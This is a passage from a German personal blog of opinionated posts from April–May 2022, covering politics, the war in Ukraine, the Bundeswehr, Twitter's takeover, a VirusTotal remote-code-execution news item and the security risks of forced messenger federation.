Die Lage ist sogar noch ein bisschen absurder. Und zwar wird das Rechenzentrum normalerweise mit finnischer Windenergie betrieben, also CO2-neutral. Und mit der Hitze von dem Rechenzentrum machen sie Fernwärme.
Wenn sie jetzt also das Rechenzentrum abklemmen, fällt auch die Fernwärme weg. In dem Artikel vermuten sie:
It's understood that switching off the heating system would force local homes to burn Russian gas instead
m(
Update: Ein Leser hat eine finnische Quelle gefunden, die sagt, das sei gar keine Sanktion gewesen sondern die hätten den Stromvertrag nicht verlängert. Die sagen auch, Yandex falle derzeit unter keine Sanktionen.

Tue May 3 2022

[l] Beim US Supreme Court geht es ja schon länger nicht mehr um Recht oder Gerechtigkeit, sondern da packen die Parteien immer ihre Kandidaten rein, um ihre Politik zu befördern.
Die Richter dort arbeiten auf Lebenszeit, daher weiß man vorher nicht, wann ein Platz frei wird. Inzwischen ist es so schlimm, dass die Republikaner monatelang unter Obama einfach den Wisch mit ihrer Zustimmung nicht unterschrieben haben, und damit die Ernennung hinausgezögert haben, bis sie wieder die Mehrheit hatten, um dann einen Betonkopf reinzusetzen.
Seit einiger Zeit haben die Republikaner im Supreme Court die klare Mehrheit. Und eigentlich ist die ganze Zeit klar, was ihr Hauptziel sein wird: Roe vs Wade, die Entscheidung von 1973, die Abtreibung legalisiert hat.
Jetzt ist der Entwurf einer Urteilsbegründung geleaked, die den Bundesstaaten erlauben würde, Abtreibung wieder zu kriminalisieren.
22 Bundesstaaten haben schon Gesetze gemacht, die dann automatisch in Kraft treten würden.
Die Entscheidung ist für den Juni geplant.
Direkt nach dem Leak haben sie um das Gebäude erstmal Barrikaden errichtet.

Mon May 2 2022

[l] Leserbrief aus der Bundeswehr zum Gepard und seinem Nachfolger:
Einen richtigen Nachfolger gibt's nicht, und das ist auch gut so, da Flakpanzer wie Gepard konzeptionell seit den 80ern ziemlich überholt sind.
Einem Nachfolger am nächsten kommt LeFlaSys (leichtes Flugabwehrsystem) a.k.a. Ozelot.
Ein kompletter Unfug: beschafft mit viel Trara, aber nur in Apothekermengen. letztlich verschießt es bloß Stingers, die man auch von der Schulter aus verschießen kann. Naja, Ozelot ist damit besser bei Nacht, aber das ist viel weniger Fähigkeit als das Budget vemruten ließ. Insgesamt eine der vielen Geldverschwendungen der Bundeswehr, wo man irgendwelche Leuchtturmprojekte verfolgt und letztlich bei den grundlagen schlampt. Wir haben zum Beispiel fast keine Artilleriemunition. Das was wir haben würde dem Heer für zwei oder drei Tage allgemeiner Kampf reichen. Der Ukrainekrieg dauert nun schon 66 Tage und fast das ganze ukrainische Heer ist involviert.
Das muss dann halt ein Abwehr-Blitzkrieg werden. Wenn wir den Feind in zwei Tagen nicht zurückgeschlagen haben, hat er halt gewonnen.
Update: Ich hab die ganze Inbox voller Bundeswehrler, die sich über den Zustand dort ausheulen. Hier ist noch einer.
ein bisschen Hintergrund zur Luftabwehr:
die die Situation ist noch viel schlimmer als man denkt: Es gibt quasi keine Flugabwehr im Heer mehr.
Die Luftwaffe hat gesagt sie regelt das schon... Mit Patriot und Eurofighter (macht nichts, das da nur die Hälfte fliegt, für mehr reichen die Raketen Reserven eh nicht...) und falls da was durchkommen sollte haben sie noch Ozelot (ein putziger kleiner Waffenträger für Stinger/Strela, ja MANPADS, selbe Fähigkeit wie ein Typ mit dem tragbaren Startrohr) Ozelot kann natürlich nicht mit den Panzern im Gelände mithalten.
Heißt in der Praxis, dass die Kämpfende Truppe auf sich gestellt ist, den Himmel im Blick behalten muss und im Notfall wertvolle Munition auf Luftziele verschwenden muss.
Ja zumindest Hubschrauber können mit den größeren Kannonen (Marder, Puma, Leopard) bekämpft werden, aber die Reichweite von modernen Panzerabwehrlenkwaffen ist so 3x größer als das zuverlässig funktioniert...
Gepard hat auch ein Reichweite Problem, aber hat zumindest ein Feuerleit Radar. Und sollte eigentlich zusammen mit mittleren Flugabwehr Raketen arbeiten. Gefahr der Raketen zwingt Flutfahrzeuge in den Tiefflug, wo die Kannonen sie runter holen.
Das hat Mal das System Roland gemacht... Rate mal, ja richtig, wurde auch abgeschafft.
Aktuell wird (für Unsummen) ein System zur "qualifizierten Flugabwehr" beschafft.
Als ich das erste Mal davon hörte dachte ich an Einsatzzertifizierung, gemeint ist aber Qualifiziert im Sinne von nicht Flugabwehr im Allgemeinen sondern nur Drohnen (die handelsüblichen kleinen, nicht Predator und co). Ist eine 40mm Granatwerfer nicht Kannone (wesentlich geringere Reichweite) Waffenstation und Radar auf Boxer... Wirklich nur gegen Quadcopter zu gebrauchen sie sich gerade auf dich stürzen.
Die Hoffnung im Heer ist wohl, dass sie die Flugabwehr wieder selber machen dürfen und dafür neue Systeme bekommen. So eine Art Mantis auf Boxer ist wohl der Favorit.
Vlt. müssen deshalb die alten Geparden weg, bevor jemand auf die Idee kommt es wäre ja billiger ein 50 Jahre altes System wieder einzuführen.

Fri Apr 29 2022

[l] Der Premierminister der British Virgin Islands ist in Miami wegen Drogenschmuggels verhaftet worden.
Ein paar Undercovercops hatten sich ihm gegenüber als Sinaloa-Kartellmitglieder vorgestellt und ihm eine große Zahlung angeboten, wenn er beim Kokainschmuggel in die USA hilft.
Als er sich dann den Bargeldhaufen angucken wollte, haben sie ihn dann verhaftet.
Die DEA hat da keine halben Sachen gemacht. Die haben auch noch Hisbollah in ihre Geschichte eingeflochten.
Mir fiel ja direkt Lethal Weapon ein. DIPLOMATIC IMMUNITY!!

Thu Apr 28 2022

[l] Apple und Google haben Nutzerdaten an Fake-"Ermittler" rausgegeben.
Ach. Ach was.
Und was haben die Angreifer damit gemacht?
Major technology companies have been duped into providing sensitive personal information about their customers in response to fraudulent legal requests, and the data has been used to harass and even sexually extort minors, according to four federal law enforcement officials and two industry investigators.
I'm shocked, I tell you. Shocked!!
Wer kam nochmal auf die Idee, dass es eine gute Idee wäre, Strafverfolgungsbehörden Zugriff auf Nacktfotos von Minderjährigen zu geben?
[l] Wer übrigens dachte, die Bayern hätten ein Monopol auf übergriffige "Sicherheits"behörden, den muss ich enttäuschen. In Niederösterreich durchsucht die Polizei auf der Suche nach einer Cannabisplantage schonmal die Dusche, in der gerade ein nacktes minderjähriges Mädchen duscht, und die Kosmetika und Unterwäsche der Töchter des Hauses.
Eine Cannabisplantage haben sie nicht gefunden. Nicht nur nicht in der Unterwäsche. Gar nicht.
Wie kam es überhaupt zu der Durchsuchung? Nun, ganz einfach:
Außerdem sei im Durchsuchungsbefehl die Rede von abgedunkelten Fenstern und einem „szenetypischen Entlüftungsrohr für Cannabis-Indoorplantagen“ im Dachbodenfenster gewesen. „Beides stimmt nicht. Es gibt kein einziges abgeklebtes Fenster in meinem Haus und ich habe auch kein Entlüftungsrohr für Indoor-Plantagen“, erklärt dazu die Hausbesitzerin.
Entschuldigt hat sich niemand. Den Job verloren hat auch niemand. In den Innendienst versetzt wurde auch niemand. Niemand muss jetzt um seine Pension bangen. Die Landespolizeidirektion verweist auf das Bundeskriminalamt, das verweist auf die Staatsanwaltschaft, und die meint, sie habe lediglich ihren Job gemacht.
Hey, das ist ja wie bei uns!!1!
Wobei. Nee. Dafür müssten die Österreicher erstmal ein paar zu effektive Steuerfahnder mit psychiatrischen Bullshit-Gutachten dienstunfähig schreiben. Pfft. Amateure! (Danke, Volkmar)

Wed Apr 27 2022

[l] Jetzt bei der Twitter-Übernahme von Elon Musk hieß es ja, Twitter habe eine "Giftpille" aufgesetzt, um feindliche Übernahmen zu verhindern. Von der hat man dann irgendwie nichts mehr gehört.
Wie man so eine Giftpille richtig aufsetzt, demonstriert gerade Disney mit Florida. Und zwar regiert in Florida einer der übelsten Betonköpfe, die die Republicans gerade zu bieten haben. Ein schmieriger Höhlentroll namens DeSantis. Der fährt unter anderem eine transfeindliche Agenda und wollte für seinen Kollegen mal so richtig schön seine Transfeindlichkeit demonstrieren, indem er sich mit Disney anlegt, die eine eher progressive Agenda vertreten, nicht zuletzt weil die Disney-Erbin sich kürzlich als trans geoutet und DeSantis kritisiert hat.
Daraufhin wollte dieser kleine hässliche Mann Disney mal zeigen, was eine Harke ist, und brachte ins Gespräch, den Sonderstatus für den Reedy Creek Improvement District wegzunehmen. Das ist ein Deal aus den 1960er Jahren. Disney hat seinen Disneyworld-Rummelpark da im Wesentlichen im Sumpfland hochgezogen, wo vorher weit und breit nichts war. Allen war klar, dass das massiv Touristen bringen und Arbeitsplätze schaffen würde, also waren sie in einer guten Verhandlungsposition. Die haben sie genutzt, um sich da eine Kommune mit weitreichender Unabhängigkeit vom Bundesland Florida zu installieren. So unabhängig, dass Disney u.a. das Recht hat, dort ein Atomkraftwerk zu betreiben (Walt Disney war Futurist und Scifi-Fan und fand Atomenergie geil; zum Bau davon kam es aber nie). Disney kümmert sich selbst um Straßen, Strom, Feuerwehr und so, und muss dafür dann keine Steuern an das Bundesland dafür abführen.
DeSantis und seine Troglodyten haben jetzt ein Gesetz gemacht, um diesen Sonderstatus zu canceln.
Und Disney hat dann mal ihre Akten gewälzt und eine Klausel gefunden, dass Florida bei Aufkündigung des Sonderstatus etwaige ausstehende Schulden der Sonderwirtschaftszone an die Gläubiger auszahlen muss. Und das wären ungefähr eine Milliarde Dollar gerade.
Das, meine Damen und Herren, ist eine amtliche Giftpille.
Die Frage ist jetzt, wieviel Steuereinnahmen Florida aus Disney herauspressen könnte, d.h. wie schnell man die Milliarde wieder drin hätte. Das weiß ich natürlich auch nicht. Vielleicht reicht das nicht als Abschreckung. Mal gucken.
Dass ich hier mal Disney verteidigen würde, hätte ich auch nicht gedacht.
[l] Wisst ihr was? Seit Jahren kotze ich mich hier über die Politik aus. Seit ich denken kann, fühle ich mich von der Politik nicht mitgenommen.
Aber jetzt ist gerade etwas passiert, was ich noch nie erlebt habe: Habeck erklärt seine Politik. Erklärt, was er tut, warum er es tut, in welcher Reihenfolge er es tut, was es für Probleme auf dem Weg gibt, und wie er sie zu lösen gedenkt.
Ich bin geflasht.
Dass das überhaupt möglich ist! In Deutschland!
Scheiße, Bernd, und den hätten wir als Kanzler haben können!!
Fuck.
Seit ich denken kann, ist das der erste Politiker, der sich mir zu erklären versucht!
Und dann auch noch in einer direkten Ansprache, nicht in einer Bullshit-Talkshow, wo er von Oppositionsdeppen mit ritueller Bullshit-Ablenk-Rhetorik und Whataboutism unterbrochen wird!
Update: Willy Brandt hat das auch mal gemacht, zu seiner Ostpolitik. Das war aber vor meiner Zeit. Hat auch damals prächtig funktioniert. Stellt sich nämlich völlig überraschend heraus: Wenn du Menschen wie Kinder behandelst, dann werden sie sich wie Kinder verhalten. Wenn du Menschen wie Erwachsene behandelst, sind sie bereit, Verantwortung zu übernehmen.
[l] Russland stellt die Gaslieferungen nach Polen und Bulgarien ein.
Warum? Weil die sich geweigert hatten, in Rubel zu bezahlen.
Polen freut sich jetzt natürlich gewaltig, dass endlich eine ihrer endlosen Provokationsversuche funktioniert zu haben scheint, und spricht von Erpressung. Wieso hält denen eigentlich überhaupt noch jemand ein Mikrofon hin?
Ich warte auch immer noch auf eine Begründung, wieso die Nato Polen reingelassen hat. Alles, was die Polen in den letzten Jahrzehnten gemacht hat, war gezielte Russen-Provokation. Will die Nato den 3. Weltkrieg?!

Tue Apr 26 2022

[l] Remote Code Execution in ... Virustotal!
Update: Oh, wartet, an der Story ist noch mehr dran! Die haben ja eine Reverse Shell aufgemacht, dann ihren Exploit zu Virustotal geschickt, und der Exploit hat sich dann bei ihrer Shell gemeldet — aber offenbar nicht von Virustotal sondern von einem gammeligen Schlangenölhersteller, der sich von Virustotal die Samples weiterleiten lässt! *wieher* (Danke, Holger)

Mon Apr 25 2022

[l] Jetzt heißt es, dass Twitter sich doch von Elon Musk kaufen lassen will.
Ich war ehrlich gesagt höchst erstaunt, dass sie sich überhaupt geziert haben.
In meiner Erinnerung hat Twitter im Wesentlichen seit ihrer Gründung vergeblich nach einem Käufer gesucht, nachdem sie jahrelang beim Monetarisieren ihrer Plattform vor sich hin scheiterten.
In meiner Realität war die Erwartungshaltung, dass wenn der erste auch nur ein bisschen zögert vor der Ablehnung, dass sich Twitter dann aber absolut sofort an denjenigen heranwirft und alles tut, um von dem gekauft zu werden.
Aber auch die andere Hälfte der Story irritiert mich. Elon Musk hat sich selbst in einem Interview als "Free Speech-Fundamentalisten" bezeichnet. Daher ist jetzt die offensichtliche Vermutung, dass unter Elon Musk Schluss mit Zensur auf Twitter ist.
Und da liegen die Nerven plötzlich blank.
In meinem Erlebnishorizont war Twitter eh schon immer die Plattform, die viel krasser als alle anderen gegen Zensur waren. Jahrelang haben Amis auf Twitter ihr Land auf Deutschland gesetzt, damit wenigstens der gröbste Nazi-Müll weggefiltert wird. Sogar nackte Brüste gab es auf Twitter! Twitter war da mangels Abo-Gebühren ihrer User in der nahezu einzigartigen Position, nicht von Visa und Mastercard und Paypal erpressbar zu sein.
Als die US-Regierung mit schattigen National Security Letters Daten abgreifen wollte, hat Twitter als einzige Plattform gegen die Schweigeklausel zu kämpfen und ihren Nutzern Bescheid zu geben. So fielen Schweinereien wie diese hier auf.
So degeneriert ist unser Realitätszweig schon, dass ich hier Twitter verteidigen muss!
Twitter hat die anderen Plattformen so beschämt, dass danach Google und Facebook auch einen auf Verteidiger der Menschenrechte gehabt haben.
In neuerer Geschichte hat die autoritäre Linke dann Massenzensur eingeführt, im Namen des Kampfes gegen Desinformation von Trump, gegen Rassismus und Sexismus, gegen Transphobie und dann gegen russische Desinformationen. Twitter hat sich gebeugt, aber sie haben sich nicht staatlichen Begehrlichkeiten gebeugt sondern dem Druck ihrer eigenen autoritären Zensurbefürworter von Nutzern.
Bei der autoritären Linken ist Zensur ja kein neutrales Konzept, sondern Zensur ist, wenn DIE MICH canceln. Wenn ICH DIE cancele, dann ist das heldenhaft, edel und gut und im Übrigen Selbstverteidigung, denn DIE sind alle BÖSE.
Der große Disconnect ist, dass die ganzen Hetzer nicht kapieren, dass Twitter so groß geworden ist, weil es Leute wie sie nicht wegzensiert hat. Twitter fing kleiner als das Heise-Forum an, und wuchs nicht wegen normaler Leute, die es da hinzog, sondern weil die ganzen schlechten Menschen da hin gingen, weil sie dort ungestört herumhetzen konnten.
Außerdem: Was ist jetzt die Befürchtung? Dass Elon Musk als Free-Speech-Fundamentalist nicht nur euch vor Zensur durch andere schützt, sondern auch andere vor Zensur durch euch?
Wieso ist das eigentlich ein Problem? Ihr habt doch die ganzen Andersdenkenden eh schon weggemobbt von Twitter. Vor wem habt ihr denn Angst hier? Ihr seid doch jetzt schon ein massiver Lynchmob! Ein schrecklicher Haufen von furchtbaren Cyberbullys!
Oder habt ihr vielmehr Angst, dass jetzt mit euch gemacht wird, was ihr jahrelang mit den anderen gemacht habt?
Ich persönlich gucke mir das in Ruhe aus der Ferne bei einem Glas Rotwein an und bin nicht betroffen.
Ich sehe auch gerade nicht, was schlimmer werden kann, wenn Elon Musk da das Free Speech-Update ausrollt. Twitter ist voll von schlechten Menschen, die sich gegenseitig Desinformation, Ignoranz und Lügnerei vorwerfen und nach Wegen suchen, gegeneinander digitale Gewalt anzuwenden, seien es jetzt Filterlisten, Wegblocken, NetzDG-Beschwerden, Anzeigen, andere Denunzierungen, und in groben Fällen Doxxing und Anschwärzen beim Arbeitgeber. Regelmäßig jedenfalls kübelt einem auf Twitter eine regelrechte Menschenverachtung entgegen — schon vor dem Krieg. Aus meiner Warte sieht es aus, als hätten die alle Recht, wenn sie sich gegenseitig für schlechte Menschen halten.
Das einzige, was ich wirklich nicht verstehe, ist wieso Stephen Fry auf Twitter ist.
Update: Ich fände das ja richtig geil, wenn Twitter als erstes die Möglichkeit abschaltet, den Account von Elon Musk zu blocken. Nur mal so als Statement an die Welt. LOL
Update: Ich hab noch ne tolle Idee! Ein Abo anbieten. Wer diesen Monat Abogebühren gezahlt hat, kann nicht geblockt werden. Das Cashflowproblem wäre gelöst!!1!

Fri Apr 15 2022

[l] Im Moment wird ja viel über die Pläne diskutiert, Messenger-Dienste gesetzlich zur Föderation zu zwingen. Dann könnte man von einem Signal-Account aus mit einem Threema-User reden z.B.
Geht natürlich eigentlich nicht um Threema und Signal sondern um Instagram und Snapchat und co. Die sollen daran gehindert werden, per Netzwerkeffekt zu wachsen. Ab einer gewissen Größe ziehen Plattformen von sich aus neue Nutzer an, die da gar nicht hinwollten, aber ihre Freunde sind halt da, also machen sie da auch einen Account auf.
Auf der einen Seite finde ich das grundsätzlich eine gute Idee, Netzwerkeffekte zu unterbrechen, und Föderation halte ich auch grundsätzlich für eine gute Idee. ALLERDINGS gehe ich an sowas immer aus Security-Sicht ran, und da ist das gar nicht so klar, ob das eine gute Idee ist.
Erstens verwenden z.B. Telegram und Signal völlig andere kryptografische Protokolle mit anderen Designzielen. Bei Signal war wichtig, dass auf Serverseite möglichst wenig bis gar keine Daten anfallen, insbesondere nicht die Inhalte der Konversationen ihrer Nutzer. Bei Telegram gibt es m.W. keine Ende-zu-Ende-Krypto, d.h. die Server können alle Inhalte sehen. Außerdem verwenden die laut eines aktuellen Reversing-Vortrags, von dem ich einen Screenshot sah, Textbook-RSA und SHA-1. SHA-1 ist anderswo schon länger rausgeflogen.
Wenn also sagen wir ein Dissident in Saudi Arabien einen Signal-Account gemacht hat, weil er auf das von Signal gebotene Datenschutzniveau angewiesen ist, dann könnte es passieren, dass er beim Kommunizieren mit Leuten das Niveau senkt und das dann am Ende vielleicht mit seiner Freiheit oder seinem Leben bezahlen muss.
Ich könnte mir das sogar prima als gezielten Angriff vorstellen. Sagen wir mal, das BKA baut einen eigenen Messenger. Nicht mit dem Ziel, dass den irgendjemand bei Verstand benutzt. Mit dem Ziel, dann über den Föderationszwang Signal zu zwingen, mit ihnen zu interoperieren, und dabei die Krypto zu schwächen. Da müsste man sehr vorsichtig sein mit Formulierung und Umsetzung des Gesetzes. Nehmen wir mal an, das BKA schickt dann mit diesem trojanischen Messenger mir eine Nachricht, und ich setze eigentlich einen ordentlichen Messenger ein. Ist dann sichergestellt, dass ich sehen kann, dass das der trojanische Messenger ist?
Nehmt z.B. Metadaten wie "ist online". Messenger können auch Location-Daten einsammeln. Bei ordentlichen Messengern ist das üblich, dass man keine Metadaten zu einem Account sehen kann, außer der Account hat zugestimmt. Könnte man solche Regelungen über den Föderationszwang umgehen? So ala "beim BKA-Messenger kann jeder alles sehen, also müsst ihr uns auch Zugriff auf alle Metadaten aller eurer User geben" oder so?
Dann wird sicher ein Albtraum, das im UI klar darzustellen. Achtung: Dieser Friend Request kommt nicht aus unserem Netz sondern vom BKA-Messengernetz.
Denn eigentlich will man das natürlich nicht haben, wenn das Ziel war, Instagram zum Aufbrechen ihrer Netze zu zwingen. Sonst ist ja der Netzwerkeffekt nicht gebrochen, wenn Instagram da einfach immer ranschreiben kann: Achtung ist unsicher, nicht zustimmen.
Man könnte das wahrscheinlich schon grundsätzlich machen, aber das würde bei allen Nutzern eine deutliche Steigerung der IT-Kompetenz voraussetzen, und Einarbeitung. Das ist das Gegenteil des Status Quo und niemand wird Bock haben, sich da in irgendwas einzuarbeiten.
Außerdem gibt es natürlich die Spam-Problematik. In der Sekunde, in der die Netze geöffnet werden, werden Spammer nicht mehr Captchas brechen müssen, um Accounts anzulegen, sondern sie können einfach einen Chatserver aufsetzen und von Instagram und co Anschluss verlangen, und dann so die Leute vollspammen. Wenn man Instagram erlaubt, Spam-Nachrichten nicht zuzustellen, dann wird Instagram natürlich immer in die falsche Richtung irren, denn die verdienen da ja nichts mit, wenn sie irgendwelche Nachrichten von irgendwelchen anderen Netzen zustellen. Da haben die ja erstmal nur Ärger und Kosten mit.
So gesehen bin ich mir nicht sicher, ob man das mit einem Gesetz überhaupt ordentlich regeln kann.
Außerdem ist ja das Niveau der User-Authentisierung ein ganz anderes zwischen Messenger-Diensten. Einige haben eine Telefonnummer von jedem User, andere haben einen Klarnamen (mehr oder weniger geprüft, eher weniger), noch anderer haben gar nichts. Wenn ich mir einen Account bei einem voll pseudonymen föderierten Chatsystem anlege, dann weiß ich ja, worauf ich mich einlasse, und ich verbringe am Ende den Hauptteil meiner Zeit damit, irgendwelche Blocklisten zu pflegen, oder gleich ganze Server aus der Föderation gar nicht reinzulassen. Am anderen Ende des Spektrums stelle ich mir ein Chatsystem einer Schule vor. Fallen die auch unter den Föderationszwang dann? Ja wohl eher nicht, oder?
Feiert diese Idee mal bitte nicht vorschnell. Bevor klar ist, wie da die Details aussehen. Sonst haben wir am Ende die nächste Cookie-Terrorbanner-Bullshitregulierung der EU, die voll nach hinten losgeht.

Wed Apr 13 2022

[l] Zur Ukraine möchte ich kurz eine kleine Parabel ausbreiten.
Gegenüber auf der anderen Straßenseite ist ein Aldi (Russland). Ich (Deutschland) gehe immer zu dem Aldi und kaufe da mein Erdgas ein. Ich bezahle immer schön mein Gas, und auf dem Weg zwischen Kasse und meiner Wohnung kommt dann immer einer (die Ukraine) und klaut mir mein Gas aus der Tasche.
Weil das auf dem Parkplatz vor dem Supermarkt passiert, beschwere ich mich bei dem Supermarkt. Der Supermarkt schenkt mir daraufhin immer soviel Erdgas, wie mir gerade geklaut wurde.
Irgendwann wird es dem Supermarkt zu blöde und er stellt da ein paar Schlägertypen als Security-Drohung hin. Der Dieb klaut fleißig weiter. Daraufhin baut der Aldi eine Pipeline durch die Ostsee, um das Erdgas an den Dieben vorbei liefern zu können.
Das dauert alles ewig, nicht zuletzt weil ich der Konstruktion der Pipeline jahrelang im Weg stehe, obwohl die für mich gebaut wird. Ist nicht meine Schuld, rationalisiere ich mir das zurecht. Ganz schönes Arschlochverhalten von mir, oder?
Währenddessen klaut der Dieb fröhlich weiter Erdgas und der Supermarkt muss mir mehr schenken.
Der Supermarkt sieht sich das ein paar Jahre an und winkt dann seinen Security-Schlägern. Die kommen und treten dem Dieb die Vorderzähne aus dem Mund.
Der Dieb kommt jetzt zu mir (!!), heult was von Polizeibrutalität herum, und fordert, dass ich ihm Waffen schenke, damit er sich gegen die Security-Schläger verteidigen kann.
Als moralischer Mensch bin ich natürlich erstmal auf Seite der Ukraine, denn die Reaktion der Schlägertypen finde ich nicht angemessen. Die war nicht verhältnismäßig und Gewalt lehne ich generell ab.
Soviel zu meiner Parabel. Reicht noch nicht? Denkt euch das mal kurz andersherum. Denkt euch das mal sorum, dass Russland bei uns einkauft, sagen wir VW-Autos. Wir liefern die VWs, aber auf der Autobahn werden unsere Transporte immer in der Ukraine überfallen und die Autos geklaut. Russland beschwert sich, weil nur die Hälfte der Autos ankommt. Wären wir dann so kulant, einfach auf unsere Kosten mehr Autos zu bauen und wieder durch die Ukraine nach Russland zu schicken?
Nein. Wären wir nicht. Wir würden das erstmal diplomatisch klären. Abkommen. Verträge. Haben die Russen genau so gesehen und gemacht. Die Ukraine hat die Verträge einfach immer gebrochen.
Die Lage war sogar noch ein bisschen krasser:
Durch die russische Subventionierung war der Gaspreis in der Ukraine bisher deutlich niedriger als in Russland selbst. In vielen Bereichen, vor allem in der Metallindustrie, belieferte die Ukraine dadurch den russischen Markt zu Dumpingpreisen und übervorteilte so die russischen Produzenten.
In unserer Parabel würde also der Dieb uns auch noch aus dem Markt drängen, indem er mit dem geklauten Waren unsere Preise unterbietet.
Wie lange würdet ihr das hinnehmen? Ne Woche? Zwei Wochen? 10 Jahre? Ernsthaft?
Ich kann Russlands Einmarsch nicht gutheißen. Aber um mal einen alten Chris Rock-Joke zu zitieren:
Now I ain't saying he shoulda killed her… but I understand
Natürlich hat der Einmarsch nicht nur mit dem Gasdiebstahl zu tun. Das geht da um Imperialismus, Zugang zur Krim, den Donbass und seine Bodenschätze, es geht vielleicht auch um geostrategische Dinge. Wer weiß, worum es den Russen tatsächlich ging. Aber hier so zu tun als sei die Ukraine die Unschuld vom Lande, das entspricht einfach nicht den Tatsachen.
Stellt euch mal kurz vor, die Russen hätten die Verträge einfach so ausgehandelt, dass der Diebstahl nicht ihr sondern unser Problem wäre. Wäret ihr dann immer noch so auf Seiten der Ukraine, wie es anscheinend gerade alle sind?
Ein Detail aus dem Wikipedia-Artikel habe ich noch:
Einen Teil ihres für 50 Dollar erworbenen Gases verkaufte die Ukraine für 260 Dollar an Rumänien.
Na? Ist die Ukraine immer noch der Held ohne Schuld und Tadel? Wie wäre es dann hiermit:
Unter der von der Ukraine zu verantwortenden[48] Gasblockade litten vor allem die südosteuropäischen Länder. Am meisten betroffen waren die Slowakei, Bulgarien, Serbien und Moldawien. Ihre Abhängigkeit vom Gas, das durch die Ukraine fließt, ist sehr hoch, während ihre Speichermöglichkeiten relativ gering sind. In Bulgarien mussten zahlreiche Schulen geschlossen werden, Brennholz und Kohle waren durch die Nachfrageflut Mangelware. Bulgarien forderte für den Lieferausfall von 124 Millionen Kubikmetern Erdgas einen Schadensersatz von Gazprom.[49][50]
… von Gazprom. Nicht von der Ukraine. Von Gazprom.
Update: Dies ist glaube ich die richtige Gelegenheit, an Horst Köhler zu erinnern.
Update: Die Parabel hat einiges an Kommentaren losgetreten, könnt ihr euch ja denken. Einen davon fand ich besonders spannend. Der meinte: Ich hab nichts dagegen, dass ich ausgeraubt werde, mache gar mit dem Dieb gemeinsame Sache gegen den Aldi, denn Großkapitalisten kann ich eh nicht leiden und mich kostet das ja nichts. Das ist ja in der Tat eine interessante Idee, dass sozusagen der Westen die ganze Zeit die Nord Stream 2 hinausgezögert hat, damit die Ukraine weiter den Russen in die Tasche greifen kann. Dann würde uns die Ukraine ja sogar noch einen schulden dafür!
Ein anderer meint: Naja, du kaufst Autos ja im Autohaus vor Ort, und wenn die Ware zwischen VW und Autohaus verloren geht, ist das in der Tat Problem von VW / dem Autohaus, nicht von dem Käufer. VW hat dann halt ne Versicherung und schlägt die Prämien auf den Kaufpreis auf. Das wäre jetzt in der Tat mal eine interessante Frage, ob Russland das auf den Kaufpreis aufgeschlagen hat.
Ein anderer Leser meinte, dass die Ukraine auch unabhängig von dem Diebstahl kräftig mitverdient hat. Das Firmengeflecht zwischen Russland und deutschen Verbrauchern diente seiner Darstellung nach unter anderem dazu, pro-russische Politiker in der Ukraine zu kaufen, beziehungsweise Politiker pro-russisch zu machen, was bis zum Euromaidan auch gut funktioniert hat. Aus Sicht dieses Lesers ist der Krieg die Reaktion Putins darauf, dass er mit Gas-Korruption nicht mehr die Politik in der Ukraine kontrollieren konnte.
Update: Einige Leser meinten, das sei ja wohl völlig in Ordnung, dass die Ukraine Gebühren haben will für die Durchleitung. Sieht die Ukraine auch so. Und Russland zahlt der Ukraine Durchleitungsgebühren. In harter Westwährung, ohne Abschlag, fristgemäß. Trotz des Krieges.

Sat Apr 9 2022

[l] Haha, die SPD. Immer wieder für einen Lacher gut.
Aktuell: Verteidigungsministerin Lamprecht will an Abrüstungspolitik festhalten und will, dass Deutschland "eine Friedensmacht" wird.
Das ist dieselbe Lamprecht, die gerade 100 Milliarden Euro für Aufrüstung lockergemacht hat. Und die jedes Jahr ein Budget von 50 Milliarden Euro für die Bundeswehr verbrennt. Die stehen für Abrüstung. Indem sie die Ukraine aufrüsten.
Das ist dieselbe SPD, die damals einen völkerrechtsbrechenden Angriffskrieg im Kosovo geführt hat.
Das ist dieselbe SPD, die für Menschenrechte und Gerechtigkeit steht, während ihr Brechmittel von einem Kanzlerkandidaten gefangene mutmaßliche Drogendealer foltern lässt und Ermittlungen gegen Cum-Ex-Gangster hinauszögert, bis sie verjährt sind.
Das ist dieselbe SPD, die für soziale Gerechtigkeit steht, indem sie den Sozialstaat abschafft, Zwangsarbeit für Arbeitslose einführt, und Rentnern ihre Renten besteuert.
Das ist dieselbe SPD, die für Kompetenz steht, und eine Frau zur Bürgermeisterin von Berlin aufstellt, die ihren Doktortitel erschummelt hat.
Der Teil daran, den ich regelmäßig am unverständlichsten finde, ist dass die immer noch von irgendwelchen Zombies da draußen gewählt werden!

Fri Apr 8 2022

[l] Kanada überlegt, Ausländer keine Häuser mehr kaufen zu lassen. Erstmal nur für zwei Jahre, nicht für immer. Hintergrund sind die stetig steigenden Immobilienpreise.
Klar, als Regierung könnte man da sozialen Wohnungsbau betreiben, aber das kostet ja Geld! Dann doch lieber ein bisschen gegen Ausländer hetzen.
Update: Mehrere Leser fanden, dass ich unfair war mit meiner Ausländerhetze-Darstellung. Kanada verbietet ja Ausländern nicht generell den Kauf von Immobilien. Wenn sie selbst im Land wohnen, dürfen sie sich einen Wohnsitz zulegen.
Aus meiner Sicht ändert das überhaupt nichts an der Sachlage. Wenn du gegen Spekulanten vorgehen willst, und dann nur ausländische Spekulanten auch nur erwähnst, ist das Ausländerhetze. Ich bin da ein bisschen sensibel, weil wir in Berlin auch ein Spekulationsproblem mit Wohnraum haben. Und es stellte sich raus, dass die meisten Spekulanten Inländer sind. Die haben dann häufig eine Briefkasten-Ltd auf einer Kanalinsel oder so, aber es sind eben keine Ausländer. Hier so zu tun, als seien die bösen Ausländer Schuld, das ist einfach Bullshit.
Es gibt natürlich das Problem der Wohnungsbaugesellschaften, die ihre Immobilien an Heuschrecken verscheuert haben. Aber diese Spekulanten hätten nie spekulieren können, wenn der Senat die Wohnungen nicht verscheuert hätte. Das ist also hausgemacht, das Problem.

Wed Apr 6 2022

[l] Der Bundesrechnungshof über das Cyber-Lagezentrum der Bundeswehr. 60 Millionen haben sie dafür schon verbrannt, seit fünf Jahren bauen die daran herum, und was haben sie erreicht? Nichts.
Das ganze Ding ist eine epische Klatsche.
Eine reguläre Ausschreibung und/oder Planung haben sie lieber nicht gemacht, weil es ja dringend war und schnell fertig werden musste (was es wie gesagt nicht wurde). Neben den ganzen anderen Details möchte ich ein paar Dinge kurz hervorheben:
1. Das ist ein Lagezentrum. Einzige Aufgabe wäre gewesen, einen Lagebericht zu erstellen.
2. Für einen landesweiten Lagebereicht braucht man eine studentische Hilfskraft, die sich auf in paar Mailinglisten subscribed. Und wenn man Geld übrig hat: Eine zweite Hilfskraft, die beim Tippen des Reports hilft.
